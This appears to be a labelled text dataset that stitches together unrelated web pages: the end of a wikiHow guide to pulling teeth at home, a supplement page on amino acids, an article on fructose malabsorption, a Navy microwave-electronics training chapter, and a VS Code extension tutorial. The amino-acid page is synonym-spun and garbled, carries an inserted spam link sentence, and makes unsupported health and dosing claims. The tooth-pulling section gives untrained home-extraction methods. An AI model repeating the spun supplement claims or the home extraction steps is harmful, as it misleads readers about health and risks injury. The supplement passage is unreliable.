salt and 8 ounces of warm water. Pull Out a Tooth Step 13Bullet2.jpg • Do not smoke. Pull Out a Tooth Step 13Bullet3.jpg • Eat soft foods and liquids for the first few days. Avoid hard, solid foods that take a lot of chewing to break down. Pull Out a Tooth Step 13Bullet4.jpg • Floss and brush your teeth as usual, taking care not to floss and brush the extraction site. Pull Out a Tooth Step 13Bullet5.jpg Method 3 of 3: Medically Unqualified Home Remedies 1. Pull Out a Tooth Step 14.jpg 1 Use a bit of gauze and lightly wiggle the tooth back and forth. Give the person a bit of gauze and tell them to hold the gauze over the tooth. • Gently wiggle the tooth back and forth, from side to side. The key word here is "gentle." • If lots of blood comes out, consider stopping the procedure. Lots of blood is usually a sign that the tooth isn't yet ready to come out. • Firmly but slowly lift the tooth up until the ligaments connecting the tooth to the gum are severed. If too much pain or blood exists, consider stopping the procedure. 2. Pull Out a Tooth Step 15.jpg 2 Have the person bite down on an apple. Biting down on an apple can be a good way to pull a tooth, especially for children. Biting down on an apple is more effective for teeth in the front than it is for teeth in the back. Ad Add your own method Save Tips • Move the tooth around very slowly. • This only works properly when the tooth is no longer anchored to any bone, and is only being held in place by gum tissue. Teeth in this state move freely in pretty much every direction and can be painful. Ad Warnings • If you suspect an infection, see a dentist immediately. Prolonged and untreated infections can develop into greater health risks. • If you are an adult or an adolescent and have loose teeth, see a dentist immediately. They can address most problems, as well as offer advice on the risks of pulling it yourself. • Pulling a tooth is very different than caring for a broken or knocked out tooth, both in adult teeth and primary teeth. If your child’s teeth have been damaged by physical trauma (ie: falling) and appear to be broken, do not follow these directions. Article Info Categories: Teeth and Mouth Recent edits by: TheAssistant, Jeff, Vspiderstorm In other languages: Español: Cómo sacar un diente, Italiano: Come Cavare un Dente, Português: Como Arrancar um Dente, Deutsch: Einen Zahn ziehen, Français: Comment retirer une dent, Русский: удалить зуб, 中文: 拔牙 Ad Thanks to all authors for creating a page that has been read 506,836 times. Was this article accurate? YesNo Contribute to wikiHow! Edit this article
__label__pos
0.876607
What Everybody Should Know about Amino Acid Supplements 1,000,000+ Free Images The sending neuron known as the presynaptic cell, while the receiving one is named the postsynaptic cell. Phenylalanine hydroxylase (PAH: more specifically phenylalanine 4-hydroxylase) is a mixed-function monooxygenase that is considered one of three enzymes belonging to the biopterin-dependent aromatic amino acid hydroxylase (AAAH) family. The opposite two enzymes in the AAAH household are tyrosine hydroxylase and tryptophan hydroxylase. The metabolism and detoxification of numerous xenobiotic compounds is also recognized to require SAM-dependent methyltransferase family enzymes. In case you have any kind of concerns with regards to where along with tips on how to make use of accobio.com, you possibly can email us from our web-page. The operate of the enzyme, isoprenylcysteine carboxyl methyltransferase (encoded by the ICMT gene) is to methylate the cysteine residues within the C-terminus of proteins following their prenylation. The SAM-dependent protein methyltransferase encoded by the LCMT1 gene (leucine carboxyl methyltransferase 1) catalyzes the methylation of a C-terminal leucine residue within the Ser/Thr phosphatase identified as PP2A, a modification required for its proper perform. Additional enzymes that make the most of SAM as a methyl donor are involved in the modification of proteins that serve features in numerous processes similar to protein damage restore, protein stability, and protein function. However, some traits of glutamine corresponding to low solubility in water, simple decomposition and poor thermal stability, in addition to manufacturing of toxic pyroglutamate throughout heat sterilization restricted its software in drugs. Bluebonnet's Chelated Magnesium Bisglycinate 60 Vegetable Capsules are formulated with 200 mg per serving of elemental magnesium from fully reacted magnesium bisglycinate, an amino acid chelate mineral from Albion that supports energy production and is critical for enzyme function. #size_60 count Reduced capacity to perform the methionine synthase response, as a result of nutritional or illness mediated deficiency of vitamin B12, results in decreased SAM manufacturing. • L-Glutamine is used when one is sick or injured, as it helps kill invading pathogens by boosting white cell manufacturing in key organs such as the liver. So, which one should you select? Basically, glutamine picks up ammonia and shuttles it between tissues, the place it can be utilized for quite a lot of capabilities, considered one of which includes cell growth and tissue repair. The hydroxyl of tyrosine can deprotonate at excessive pH forming the negatively charged phenolate. Tyrosine is produced in cells by hydroxylating the important amino acid phenylalanine. This is most serious within the mind & coronary heart as a result of the cells in these tissues are non-dividing. The perfect essential amino acid supplements with few added or artificial components are considered to be purer, while supplements that contain a bunch of other substances are thought of to be much less pure. If you want to take the powder form of this nutrient, then 1-three grams per day should do whereas preventing the infection. The required biopterin is in the form of tetrahydrobiopterin (often designated BH4 or H4B). Dihydrobiopterin is then transformed to tetrahydrobiopterin by the NADH-dependent enzyme commonly referred to as dihydropteridine reductase. The conversion of phosphatidylethanolamine (PE) to phosphatidylcholine (Pc) requires the enzyme phosphatidylethanolamine N-methyltransferase (encoded by the PEMT gene) which carries out three successive SAM-dependent methylation reactions. But when you’re a bicep boy who does 20 sets of curls then get out the squat rack and save your cash for a new sleeveless top as a substitute! These methyltransferases are categorized as either N-methyltransferases or O-methyltransferases dependent on whether or not the acceptor of the methyl group is nitrogen or an oxygen, respectively. These methyltransferases all utilize SAM as the methyl donor and incorporate the methyl group onto lysine residues, arginine residues, and histidine residues in proteins. The DNA methyltransferases encoded by the DNMT1 and DNMT3 genes utilize SAM within the methylation of cytidine residues found in CpG dinucleotides in DNA. It is found in abundance in carrots, papaya, and spinach leaves. The synthesis of the diphthamide residue discovered on His715 in human translation elongation factor eEF2 requires a methylation step involving SAM as the methyl donor. The conversion of serotonin to melatonin requires the enzyme acetylserotonin O-methyltransferase encoded by the ASMT gene. Creatine synthesis also requires SAM-dependent methylation in a response catalyzed by guanidinoacetate N-methyltransferase (encoded by the GAMT gene). 23.5% lower levels of creatine kinase (310 vs. You’ve most likely heard that calcium is sweet for strong bones, but some evidence means that calcium helps decrease cholesterol levels as properly. The FDA claims that there’s no proof that NAC was used as a supplement previous to its use as a drug – so together with NAC in a supplement makes the product an unapproved drug and thus unlawful. Use Code “PALEOWOMEN” at checkout! The absorption has been proven to be reliable on account of the usage of the specialised MICROGEL™ technology. Humans categorical three genes that catalyze the SAM-dependent cysteine methylation reaction on prenylated proteins with the ICMT gene being probably the most abundantly expressed. This relationship is very like that between cysteine and methionine. Got a question you’d like us to reply? Leave a Reply
__label__pos
0.916889
Fructose Malabsorption and IBS Difficulty Digesting Fruit Sugar May Produce Discomfort Berries are actually low in fructose and so may provide an option if a fructose malabsorption problem is contributing to your symptoms. Photo: Jonathan Kantor/Getty Images Is fructose malabsorption part of the IBS puzzle? Fructose is a type of sugar found in fruits and some vegetables. Some research has looked at the role that ingesting foods that contain fructose has on unpleasant digestive symptoms. Although quite limited and preliminary, the initial data is worth taking a look at if you suspect that fruits are be contributing to your intestinal distress. What Is Fructose Malabsorption? The symptoms of fructose malabsorption, formerly known as fructose intolerance, are digestive discomforts after eating or drinking food or drinks containing fructose, the sugar found in many fruits. The condition is thought to be the result of fructose not being fully absorbed in the small intestine. The fructose then makes its way into the large intestine where it is set upon and fermented by intestinal bacteria. This process can fafect GI motility and contribute to unwanted gas and bloating. Some people with fructose malabsorption can tolerate small amounts of fructose, but symptoms occur when too much fructose is ingested in too short a period of time. For some individuals, fructose malabsorption may be the result of small intestine bacterial overgrowth (SIBO). The identification of fructose malabsorption is a key component of the theory behind the use of a low FODMAPs diet for IBS. Fructose malabsorption is a markedly different condition than hereditary fructose intolerance, a genetic disorder typically diagnosed in infancy. How Is Fructose Malabsorption Diagnosed? The hydrogen breath test might be done, measuring the amount of hydrogen in the breath following the ingestion of a fructose solution. An increase in hydrogen is believed to indicate that the fructose in the solution has been fermented by bacteria in the large intestine. However, the hydrogen breath test is not completely reliable. It can show a positive result even if the person doesn't have malabsorption. While some reviews say it is valuable, others point out its unreliability. Small intestinal bacterial overgrowth (SIBO) is another possible diagnosis when the hydrogen breath test is positive, and the doctor must determine whether that is the proper diagnosis rather than fructose malabsorption. What are the Research Findings? One study made a comparison between healthy individuals and people who were self-identified as suffering from fructose intolerance based on the fact that they experienced bloating and flatulence after eating certain fruits. Although the results must be interpreted with caution due to the extremely small number of individuals (8 patients, 4 controls) who participated in the study, the results are interesting. The self-identified patients had higher hydrogen levels and did experience more bloating and flatulence as a result of drinking the solution than did the healthy individuals. The finding that test subjects experienced symptoms from the fructose solution itself was replicated in another study, one that used a much larger population. A total of 183 individuals who had unexplained digestive symptoms participated. Three-quarters of these individuals experienced abdominal symptoms following the ingestion of the fructose solution. These symptoms included flatulence, abdominal pain, bloating, belching and a change in bowel habit. One study looked specifically at fructose intolerance in adults diagnosed with IBS. Of the 80 study participants, almost one-third had a positive hydrogen breath test result following ingestion of the fructose solution. Of these patients, 26 participated in a follow-up assessment one year later. On follow-up, 14 of these patients reported that they were able to comply with a fructose-restricted diet and experienced significant improvement in the symptoms of pain, belching, bloating, indigestion and diarrhea. Difficulty with fructose is one of the key findings behind the​ low FODMAPs theory for IBS. This theory has received significant research for its effectiveness in reducing IBS symptoms. The Bottom Line Research on the role of fructose malabsorption in IBS is still in its preliminary stages. However, if your symptoms of gas, bloating and diarrhea seem related to the ingestion of fruits, a fructose problem might be something to consider. Keep a food diary for several weeks to determine if there is a such a relationship. If so, speak to your doctor about the possibility of taking the hydrogen breath test and ask your doctor’s opinion about trying an elimination diet. Sources: Food Allergies and Intolerances 105: Fructose Malabsorption. American Gastroenterological Association. http://www.gastro.org/info_for_patients/food-allergies-and-intolerances-105-fructose-malabsorption Choi, Y., Kraft, N., Zimmerman, B., Jackson, M. & Rao, S. Fructose Intolerance in IBS and Utility of Fructose-Restricted Diet. Journal of Clinical Gastroenterology 2008 42:233-238. Fedewa A, Rao SSC. Dietary Fructose Intolerance, Fructan Intolerance and FODMAPs. Current Gastroenterology Reports. 2013;16(1). doi:10.1007/s11894-013-0370-0.   Mann, N. & Cheung, E. “ Fructose-induced breath hydrogen in patients with fruit intolerance.Journal of Clinical Gastroenterology 2008 42:157-159. Yao CK, Tuck CJ. The clinical value of breath hydrogen testing. Journal of Gastroenterology and Hepatology. 2017;32:20-22. doi:10.1111/jgh.13689. 
__label__pos
0.736672
Custom Search Over 9,000 pages indexed! Your Host Click here to read about RF CafeKirt Blattenberger ... single-handedly redefining what an engineering website should be. View the YouTube RF Cafe Intro Video Carpe Diem! (Seize the Day!) 5CCG (5th MOB): My USAF radar shop Hobby & Fun Airplanes and Rockets: My personal hobby website Equine Kingdom: My daughter Sally's horse riding business website - lots of info Doggy Dynasty: My son-in-law's dog training business •−•  ••−•    −•−•  •−  ••−•  • RF Cafe Morse Code >Hear It< Job Board About RF Cafe© RF Cafe E-Mail Product & Service Directory Engineering Jobs Personally Selected Manufacturers Employers Only (no recruiters) Navy Electricity and Electronics Training Series (NEETS) Module 11—Microwave Principles Chapter 2:  Pages 2-41 through 2-50     Crossed-field amplifier (Amplitron) Figure 2-38.—Crossed-field amplifier (Amplitron).   Q-44. Why is the pi mode the most commonly used magnetron mode of operation? Q-45. What two methods are used to couple energy into and out of magnetrons? Q-46. Magnetron tuning by altering the surface-to-volume ratio of the hole portion of a hole-and-slot cavity is what type of tuning?   Q-47. Capacitive tuning by inserting a ring into the cavity slot of a magnetron is accomplished by what type of tuning mechanism?   SOLID-STATE MICROWAVE DEVICES As with vacuum tubes, the special electronics effects encountered at microwave frequencies severely limit the usefulness of transistors in most circuit applications. The need for small-sized microwave devices has caused extensive research in this area. This research has produced solid-state devices with higher and higher frequency ranges. The new solid-state microwave devices are predominantly active, two-terminal diodes, such as tunnel diodes, varactors, transferred-electron devices, and avalanche transit- time diodes. This section will describe the basic theory of operation and some of the applications of these relatively new solid-state devices. Tunnel Diode Devices The TUNNEL DIODE is a PN junction with a very high concentration of impurities in both the p and n regions. The high concentration of impurities causes it to exhibit the properties of a negative-resistance element over part of its range of operation, as shown in the characteristic curve in figure 2-39. In other words, the resistance to current flow through the tunnel diode increases as the applied voltage increases over a portion of its region of operation. Outside the negative-resistance region, the tunnel diode functions essentially the same as a normal diode. However, the very high impurity density causes a junction depletion region so narrow that both holes and electrons can transfer across the PN junction by a quantum   2-41 mechanical action called TUNNELING. Tunneling causes the negative-resistance action and is so fast that no transit-time effects occur even at microwave frequencies. The lack of a transit-time effect permits the use of tunnel diodes in a wide variety of microwave circuits, such as amplifiers, oscillators, and switching devices. The detailed theory of tunnel-diode operation and the negative-resistance property exhibited by the tunnel diode was discussed in NEETS, Module 7, Introduction to Solid-State Devices and Power Supplies, Chapter 3. Tunnel-diode characteristic curve Figure 2-39.—Tunnel-diode characteristic curve.   TUNNEL-DIODE OSCILLATORS.—A tunnel diode, biased at the center point of the negative- resistance range (point B in figure 2-39) and coupled to a tuned circuit or cavity, produces a very stable oscillator. The oscillation frequency is the same as the tuned circuit or cavity frequency. Microwave tunnel-diode oscillators are useful in applications that require microwatts or, at most, a few milliwatts of power, such as local oscillators for microwave superheterodyne receivers. Tunnel-diode oscillators can be mechanically or electronically tuned over frequency ranges of about one octave and have a top-end frequency limit of approximately 10 gigahertz. Tunnel-diode oscillators that are designed to operate at microwave frequencies generally use some form of transmission line as a tuned circuit. Suitable tuned circuits can be built from coaxial lines, transmission lines, and waveguides. An example of a highly stable tunnel-diode oscillator is shown in figure 2-40. A tunnel-diode is loosely coupled to a high-Q tunable cavity. Loose coupling is achieved by using a short, antenna feed probe placed off-center in the cavity. Loose coupling is used to increase the stability of the oscillations and the output power over a wider bandwidth. 2-42   Tunnel-diode oscillator Figure 2-40.—Tunnel-diode oscillator.   The output power produced is in the range of a few hundred microwatts, sufficient for many microwave applications. The frequency at which the oscillator operates is determined by the physical positioning of the tuner screw in the cavity. Changing the output frequency by this method is called MECHANICAL TUNING. In addition to mechanical tuning, tunnel-diode oscillators may be tuned electronically. One method is called BIAS TUNING and involves nothing more than changing the bias voltage to change the bias point on the characteristic curve of the tunnel-diode. Another method is called VARACTOR TUNING and requires the addition of a varactor to the basic circuit. Varactors were discussed in NEETS, Module 7, Introduction to Solid-State Devices, and Power Supplies, Chapter 3. Tuning is achieved by changing the voltage applied across the varactor which alters the capacitance of the tuned circuit. TUNNEL-DIODE AMPLIFIERS.—Low-noise, tunnel-diode amplifiers represent an important microwave application of tunnel diodes. Tunnel-diode amplifiers with frequencies up to 85 gigahertz have been built in waveguides, coaxial lines, and transmission lines. The low-noise generation, gain ratios of up to 30 dB, high reliability, and light weight make these amplifiers ideal for use as the first stage of amplification in communications and radar receivers. Most microwave tunnel-diode amplifiers are REFLECTION-TYPE, CIRCULATOR-COUPLED AMPLIFIERS. As in oscillators, the tunnel diode is biased to the center point of its negative-resistance region, but a CIRCULATOR replaces the tuned cavity. A circulator is a waveguide device that allows energy to travel in one direction only, as shown in figure 2-41. The tunnel diode in figure 2-41 is connected across a tuned-input circuit. This arrangement normally produces feedback that causes oscillations if the feedback is allowed to reflect back to the tuned- input circuit. The feedback is prevented because the circulator carries all excess energy to the absorptive load (R L). In this configuration the tunnel diode cannot oscillate, but will amplify. 2-43   Tunnel-diode amplifier Figure 2-41.—Tunnel-diode amplifier.   The desired frequency input signal is fed to port 1 of the circulator through a bandpass filter. The filter serves a dual purpose as a bandwidth selector and an impedance-matching device that improves the gain of the amplifiers. The input energy enters port 2 of the circulator and is amplified by the tunnel diode. The amplified energy is fed from port 2 to port 3 and on to the mixer. If any energy is reflected from port 3, it is passed to port 4, where it is absorbed by the matched load resistance. TUNNEL-DIODE FREQUENCY CONVERTERS AND MIXERS.—Tunnel diodes make excellent mixers and frequency converters because their current-voltage characteristics are highly nonlinear. While other types of frequency converters usually have a conversion power loss, tunnel-diode converters can actually have a conversion power gain. A single tunnel diode can also be designed to act as both the nonlinear element in a converter and as the negative-resistance element in a local oscillator at the same time. Practical tunnel-diode frequency converters usually have either a unity conversion gain or a small conversion loss. Conversion gains as high as 20 dB are possible if the tunnel diode is biased near or into the negative-resistance region. Although high gain is useful in some applications, it presents problems in stability. For example, the greatly increased sensitivity to variations in input impedance can cause high- gain converters to be unstable unless they are protected by isolation circuitry. As with tunnel-diode amplifiers, low-noise generation is one of the more attractive characteristics of tunnel-diode frequency converters. Low-noise generation is a primary concern in the design of today's extremely sensitive communications and radar receivers. This is one reason tunnel-diode circuits are finding increasingly wide application in these fields.   Q-48. Name the procedure used to reduce excessive arcing in a magnetron?   Q-49. What causes the negative-resistance property of tunnel diodes? Q-50. What determines the frequency of a tunnel-diode oscillator? Q-51. Why is the tunnel diode loosely coupled to the cavity in a tunnel-diode oscillator?   Q-52. What is the purpose of the circulator in a tunnel-diode amplifier?     2-44 Varactor Devices The VARACTOR is another of the active two-terminal diodes that operates in the microwave range. Since the basic theory of varactor operation was presented in NEETS, Module 7, Introduction to Solid- State Devices and Power Supplies, Chapter 3, only a brief review of the basic principles is presented here. The varactor is a semiconductor diode with the properties of a voltage-dependent capacitor. Specifically, it is a variable-capacitance, PN-junction diode that makes good use of the voltage dependency of the depletion-area capacitance of the diode. In figure 2-42A, two materials are brought together to form a PN-junction diode. The different energy levels in the two materials cause a diffusion of the holes and electrons through both materials which tends to balance their energy levels. When this diffusion process stops, the diode is left with a small area on either side of the junction, called the depletion area, which contains no free electrons or holes. The movement of electrons through the materials creates an electric field across the depletion area that is described as a barrier potential and has the electrical characteristics of a charged capacitor.   PN-junction diode as a variable capacitor Figure 2-42A.—PN-junction diode as a variable capacitor.   External bias, applied in either the forward or reverse direction, as shown in figure 2-42B and C, affects the magnitude, barrier potential, and width of the depletion area. Enough forward or reverse bias will overcome the barrier potential and cause current to flow through the diode. The width of the depletion region can be controlled by keeping the bias voltage at levels that do not allow current flow. Since the depletion area acts as a capacitor, the diode will perform as a variable capacitor that changes with the applied bias voltage. The capacitance of a typical varactor can vary from 2 to 50 picofarads for a bias variation of just 2 volts. PN-junction diode as a variable capacitor Figure 2-42B.—PN-junction diode as a variable capacitor.     2-45   PN-junction diode as a variable capacitor - RF Cafe Figure 2-42C.—PN-junction diode as a variable capacitor.   The variable capacitance property of the varactor allows it to be used in circuit applications, such as amplifiers, that produce much lower internal noise levels than circuits that depend upon resistance properties. Since noise is of primary concern in receivers, circuits using varactors are an important development in the field of low-noise amplification. The most significant use of varactors to date has been as the basic component in parametric amplifiers. PARAMETRIC AMPLIFIERS.—The parametric amplifier is named for the time-varying parameter, or value of capacitance, associated with the operation. Since the underlying principle of operation is based on reactance, the parametric amplifier is sometimes called a REACTANCE AMPLIFIER. The conventional amplifier is essentially a variable resistance that uses energy from a dc source to increase ac energy. The parametric amplifier uses a nonlinear variable reactance to supply energy from an ac source to a load. Since reactance does not add thermal noise to a circuit, parametric amplifiers produce much less noise than most conventional amplifiers. Because the most important feature of the parametric amplifier is the low-noise characteristic, the nature of ELECTRONIC NOISE and the effect of this type of noise on receiver operation must first be discussed. Electronic noise is the primary limitation on receiver sensitivity and is the name given to very small randomly fluctuating voltages that are always present in electronic circuits. The sensitivity limit of the receiver is reached when the incoming signal falls below the level of the noise generated by the receiver circuits. At this point the incoming signal is hidden by the noise, and further amplification has no effect because the noise is amplified at the same rate as the signal. The effects of noise can be reduced by careful circuit design and control of operating conditions, but it cannot be entirely eliminated. Therefore, circuits such as the parametric amplifier are important developments in the fields of communication and radar. The basic theory of parametric amplification centers around a capacitance that varies with time. Consider the simple series circuit shown in figure 2-43. When the switch is closed, the capacitor charges to value (Q). If the switch is opened, the isolated capacitor has a voltage across the plates determined by the charge Q divided by the capacitance C. 2-46 Voltage amplification from a varying capacitor Figure 2-43.—Voltage amplification from a varying capacitor.   An increase in the charge Q or a decrease in the capacitance C causes an increase in the voltage across the plates. Thus, a voltage increase, or amplification, can be obtained by mechanically or electronically varying the amount of capacitance in the circuit. In practice a voltage-variable capacitance, such as a varactor, is used. The energy required to vary the capacitance is obtained from an electrical source called a PUMP. Figure 2-44, view (A), shows a circuit application using a voltage-variable capacitor and a pump circuit. The pump circuit decreases the capacitance each time the input signal (E) across the capacitor reaches maximum. The decreased capacitance causes a voltage buildup as shown by the dotted line in view (B). Therefore, each time the pump decreases capacitance (view (C)), energy transfers from the pump circuit to the input signal. The step-by-step buildup of the input-signal energy level is shown in view (D).   Energy transfer from pump signal to input signal Figure 2-44.—Energy transfer from pump signal to input signal.   2-47 Proper phasing between the pump and the input signal is crucial in this circuit. The electrical pump action is simply a sine-wave voltage applied to a varactor located in a resonant cavity. For proper operation, the capacitance must be decreased when the input voltage is maximum and increased when the input voltage is minimum. In other words, the pump signal frequency must be exactly double the frequency of the input signal. This relationship can be seen when you compare views (B) and (C). A parametric amplifier of the type shown in figure 2-44 is quite phase-sensitive. The input signal and the capacitor variation are often in the wrong phase for long periods of time. A parametric amplifier that is not phase-sensitive, referred to as a NONDEGENERATIVE PARAMETRIC AMPLIFIER, uses a pump circuit with a frequency higher than twice the input signal. The higher-frequency pump signal mixes with the input signal and produces additional frequencies that represent both the sum and difference of the input signal and pump frequencies. Figure 2-45A, is a diagram of a typical nondegenerative parametric amplifier with the equivalent circuit shown in figure 2-45B. The pump signal (fp) is applied to the varactor. The cavity on the left is resonant at the input frequency (fs), and the cavity on the right is resonant at the difference frequency (fp-fs). The difference frequency is called the IDLER- or LOWER-SIDEBAND frequency. The varactor is located at the high-voltage points of the two cavities and is reverse biased by a small battery. The pump signal varies the bias above and below the fixed-bias level. Nondegenerative parametric amplifier. CIRCUIT Figure 2-45A.—Nondegenerative parametric amplifier. CIRCUIT. 2-48   Nondegenerative parametric amplifier. ELECTRICAL EQUIVALENT Figure 2-45B.—Nondegenerative parametric amplifier. ELECTRICAL EQUIVALENT.   The pump signal causes the capacitor in figure 2-45A to vary at a 12-gigahertz rate. The 3-gigahertz input signal enters via a four-port ferrite circulator, is developed in the signal cavity, and applied across the varactor. The nonlinear action of the varactor produces a 9-gigahertz difference frequency (fp-fs) with an energy-level higher than the original input signal. The difference (idler) frequency is reapplied to the varactor to increase the gain and to produce an output signal of the correct frequency. The 9-gigahertz idler frequency recombines with the 12-gigahertz pump signal and produces a 3-gigahertz difference signal that has a much larger amplitude than the original 3-gigahertz input signal. The amplified signal is sent to the ferrite circulator for transfer to the next stage. As with tunnel-diode amplifiers, the circulator improves stability by preventing reflection of the signal back into the amplifier. Reflections would be amplified and cause uncontrollable oscillations. The ferrite circulator also serves as an isolator to prevent source and load impedance changes from affecting gain. Typically, the gain of a parametric amplifier is about 20 dB. The gain can be controlled with a variable attenuator that changes the amount of pump power applied to the varactor. Parametric amplifiers are relatively simple in construction. The only component is a varactor diode placed in an arrangement of cavities and waveguides. The most elaborate feature of the amplifier is the mechanical tuning mechanism. Figure 2-46 illustrates an actual parametric amplifier. 2-49   Figure 2-46.—Parametric amplifier.   PARAMETRIC FREQUENCY CONVERTERS.—Parametric frequency converters, using varactors, are of three basic types. The UPPER-SIDEBAND PARAMETRIC UP-CONVERTER produces an output frequency that is the SUM of the input frequency and the pump frequency. The LOWER-SIDEBAND PARAMETRIC DOWN-CONVERTER produces an output frequency that is the DIFFERENCE between the pump frequency and the input frequency. The DOUBLE-SIDEBAND PARAMETRIC UP-CONVERTER produces an output in which both the SUM and the DIFFERENCE of the pump and input frequencies are available. Parametric frequency converters are very similar to parametric amplifiers in both construction and operation. Figure 2-47 is a functional diagram of a parametric down-converter. The parametric frequency converter operates in the same manner as the parametric amplifier except that the sideband frequencies are not reapplied to the varactor. Therefore, the output is one or both of the sideband frequencies and is not the same as the input frequency. The output frequency is determined by the cavity used as an output. For example, the idler cavity in figure 2-47 could be replaced by a cavity that is resonant at the upper-sideband frequency (22 gigahertz) to produce an upper-sideband parametric up-converter. Since input and output signals are at different frequencies, the parametric frequency converter does not require a ferrite circulator. However, a ferrite isolator is used to isolate the converter from changes in source impedance.   Figure 2-47.—Lower-sideband parametric down-converter.   2-50  Introduction to Matter, Energy, and Direct Current, Introduction to Alternating Current and Transformers, Introduction to Circuit Protection, Control, and Measurement, Introduction to Electrical Conductors, Wiring Techniques, and Schematic Reading, Introduction to Generators and Motors, Introduction to Electronic Emission, Tubes, and Power Supplies, Introduction to Solid-State Devices and Power Supplies, Introduction to Amplifiers, Introduction to Wave-Generation and Wave-Shaping Circuits, Introduction to Wave Propagation, Transmission Lines, and Antennas, Microwave Principles, Modulation Principles, Introduction to Number Systems and Logic Circuits, Introduction to Microelectronics, Principles of Synchros, Servos, and Gyros, Introduction to Test Equipment, Radio-Frequency Communications Principles, Radar Principles, The Technician's Handbook, Master Glossary, Test Methods and Practices, Introduction to Digital Computers, Magnetic Recording, Introduction to Fiber Optics RF Cafe Software RF Cascade Workbook RF Cascade Workbook is a very extensive system cascaded component Excel workbook that includes the standard Gain, NF, IP2, IP3, Psat calculations, input & output VSWR, noise BW, min/max tolerance, DC power cauculations, graphing of all RF parameters, and has a graphical block diagram tool. An extensive User's Guide is also included. - Only $35. RF system analysis including frequency conversion & filters Smith Chart™ for Excel Smith Chart™ for Visio RF & EE Symbols Word RF Stencils for Visio A Disruptive Web Presence Custom Search Over 9,000 pages indexed! Read About RF Cafe Webmaster: Kirt Blattenberger KB3UON Product & Service Directory Personally Selected Manufacturers RF Cafe T-Shirts & Mugs Calculator Workbook RF Workbench Please Support My Advertisers
__label__pos
0.986602
Building a VSCode Extension: Part Three TwitterCorey O'Donnell Avatar Corey O'Donnell 8 min read ––– Now that I have a blank VS Code extension set up and working, I want to start building on it. Adding some Code formatting configs The Yeoman template for VS Code Extension does not have any formatting configs that I typically use for my projects. I make sure to always have an .editorconfig file. EditorConfig is used to help maintain consistent coding styles for whitespace across everyone's text editors and IDEs. Here is an example I typically use on my typescript projects. # .editorconfig # top-most EditorConfig file root = true # Unix-style newlines with a newline ending every file [*] end_of_line = lf insert_final_newline = true trim_trailing_whitespace = true # Matches multiple files with brace expansion notation # Set default charset [*.{js,jsx,ts,tsx}] charset = utf-8 indent_style = space indent_size = 4 # Matches the exact files either package.json or .travis.yml [package.json] indent_style = space indent_size = 2 Prettier adds even more code formatting. It really helps create a consistent code style. Every developer has a different way of implementing code. Having a consistent style is important for open source. Here is the .prettierrc config I am using for my extension. { "printWidth": 160, "trailingComma": "none", "tabWidth": 4, "useTabs": false, "semi": true, "singleQuote": true, "jsxSingleQuote": true, "bracketSpacing": true } I work on multiple projects that all require a different node version. I use NVM along with AVN to auto switch my node version depending on which repository I am in. Example .node-version file used in this repository. v12.18.3 With some consistency added to the code base, it's time to work on the react app. Bootstrapping React Creating a brand new react app is fairly simple using the create-react-app tool. I knew I wanted the app in a subdirectory called webview in my extension. First I navigated to the src directory and then used create-react-app to set up an empty react app. I used the typescript template since I wanted this entire extension using typescript including the react portion. cd src/ npx create-react-app webview --template typescript Now I just wanted to verify everything was set up and working. cd webview/ npm run start It failed with this error... There might be a problem with the project dependency tree. It is likely not a bug in Create React App, but something you need to fix locally. The react-scripts package provided by Create React App requires a dependency: "eslint": "^6.6.0" Don't try to install it manually: your package manager does it automatically. However, a different version of eslint was detected higher up in the tree: /home/CodeByCorey/workspace/vscode-todo-task-manager/node_modules/eslint (version: 7.7.0) Manually installing incompatible versions is known to cause hard-to-debug issues. If you would prefer to ignore this check, add SKIP_PREFLIGHT_CHECK=true to an .env file in your project. That will permanently disable this message but you might encounter other issues. To fix the dependency tree, try following the steps below in the exact order: 1. Delete package-lock.json (not package.json!) and/or yarn.lock in your project folder. 2. Delete node_modules in your project folder. 3. Remove "eslint" from dependencies and/or devDependencies in the package.json file in your project folder. 4. Run npm install or yarn, depending on the package manager you use. In most cases, this should be enough to fix the problem. If this has not helped, there are a few other things you can try: 5. If you used npm, install yarn (http://yarnpkg.com/) and repeat the above steps with it instead. This may help because npm has known issues with package hoisting which may get resolved in future versions. 6. Check if /home/CodeByCorey/workspace/vscode-todo-task-manager/node_modules/eslint is outside your project directory. For example, you might have accidentally installed something in your home folder. 7. Try running npm ls eslint in your project folder. This will tell you which other package (apart from the expected react-scripts) installed eslint. If nothing else helps, add SKIP_PREFLIGHT_CHECK=true to an .env file in your project. That would permanently disable this preflight check in case you want to proceed anyway. P.S. We know this message is long but please read the steps above :-) We hope you find them helpful! I looked in the root package.json for my VS Code extension and it is using eslint@7 and react-scrips requires eslint@6. Due to how yarn/npm handles packages, my react app was not installing eslint at v6 because yarn already saw it installed at v7 at the root of the project. The easiest solution I used was to downgrade my extension's eslint version on my root project. # navigate back to the root of the project cd ../../ yarn add -D eslint@6 cd src/webview yarn start Boom! It worked and opened my app in the browser at http://localhost:3000 I moved the extension.ts into its own directory to help keep the webview and extension separate. mkdir -p src/extension mv src/extension.ts src/extension/extension.ts and changed the main key on the package.json to use the new folder structure "main": "./dist/extension/extension.js" How do I get VS Code to open it?? The react app is working in my browser but how do I make VS Code display it? First thing I did was add the VS Code commands that would open the react app inside package.json "activationEvents": [ "onCommand:vscode-task-manager.openTodoManager" ], "contributes": { "commands": [ { "command": "vscode-task-manager.openTodoManager", "title": "Todo Manager" } ] } Inside extension.ts I replace the helloWorld command with my new command. Using the Webview docs I figured out how to open a panel with HTML. import * as vscode from 'vscode'; export function activate(context: vscode.ExtensionContext) { context.subscriptions.push( vscode.commands.registerCommand('vscode-task-manager.openTodoManager', () => { // Create and show panel const panel = vscode.window.createWebviewPanel('todoManager', 'Todo Manager', vscode.ViewColumn.One, { enableScripts: true }); // And set its HTML content panel.webview.html = getWebviewContent(); }) ); } function getWebviewContent() { return ` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Todo Task Manager</title> </head> <body> <h1>Hello TODO</h1> </body> </html> `; } When you run the extension and trigger the Todo Manager command, it should open a new panel that display Hello TODO; Now lets figure out how to get my react resources loaded into the HTML. I need to move my reacts compiled code into the dist directory for my extension to use. I created a npm script inside my react project to move the folder after its finished building using postbuild. "scripts": { "start": "react-scripts start", "build": "react-scripts build", "postbuild": "rimraf ../../dist/webview && mv build ../../dist/webview", "test": "react-scripts test", "eject": "react-scripts eject" } The location of the extensions files on the file system is conveniently attached to the context parameter on the activate function. I passed the object to my getWebviewContent() function where I plan to fetch all the react resources. React is nice enough to offer an asset-manifest.json to find out the name of all the compiled assets. Using path, context.extensionPath, and 